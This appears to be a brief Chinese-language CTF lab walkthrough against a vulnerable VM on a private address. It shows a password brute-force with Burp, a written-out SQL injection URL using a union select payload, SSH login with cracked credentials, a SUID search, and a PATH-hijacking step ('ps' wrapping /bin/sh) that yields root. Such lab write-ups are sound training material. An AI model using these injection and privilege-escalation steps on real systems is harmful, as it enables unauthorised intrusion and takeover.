nmap 扫描端口
image.png
访问首页有个 gif 图片,下载下来用 exiftool 看一下会发现有个 comment
image.png
访问一下 kzMb5nVYJw,要输 key,尝试用 burp 选了个 password 的字典爆破一下:
elite
image.png
访问之后发现:
image.png
输入 “ 报错
image.png
然后…
image.png
一年没有手工注入了,还有点怀念
http://192.168.149.195/kzMb5nVYJw/420search.php?usrtosearch="union select 1,2,3%23
image.png
你以为我接下来要手注?不,我已经忘了那些单词咋拼了 Orz…
image.png
先 base64 解码一遍,然后 md5 解出来是 omega
image.png
扫目录发现
image.png
去访问一下 phpmyadmin,试了几个密码登不上
然后对着 777 端口去连接 ssh,连上了
image.png
find 找一下带有 S 权限的
find / -user root -perm -4000 -print 2>/dev/null
image.png
把那个 /var/www/backup/procwatch 给拷贝下来
echo ‘/bin/sh’ > ps
chmod +x ps
PATH=/var/www/backup
./procwatch
然后就拿到了 root 权限,但是因为环境变量改了,所以没法直接用 ls,可以 /bin/ls
image.png
